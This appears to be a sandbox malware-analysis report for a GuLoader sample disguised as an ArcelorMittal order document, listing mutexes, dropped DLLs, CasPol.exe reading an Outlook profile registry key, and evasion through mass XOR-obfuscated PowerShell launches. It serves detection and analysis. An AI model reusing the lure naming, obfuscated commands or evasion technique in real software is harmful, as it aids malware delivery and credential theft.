Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3368:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1956:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:312:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1764:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3000:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4312:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:312:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe PID: 408, type: MEMORYSTR
Source: Yara match	File source: 00000097.00000000.63070891541.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_10002DE0 push eax; ret	1_2_10002E0E
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FAB7F8 pushfd ; ret	1_2_02FAB7AA
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Code function: 1_2_02FA98F0 push edi; retf	1_2_02FA98F6

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_10001B18

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	File created: C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	File created: C:\Users\user\AppData\Local\Temp\nspD224.tmp\nsExec.dll			Jump to dropped file

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Mass process execution to delay analysis

Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677
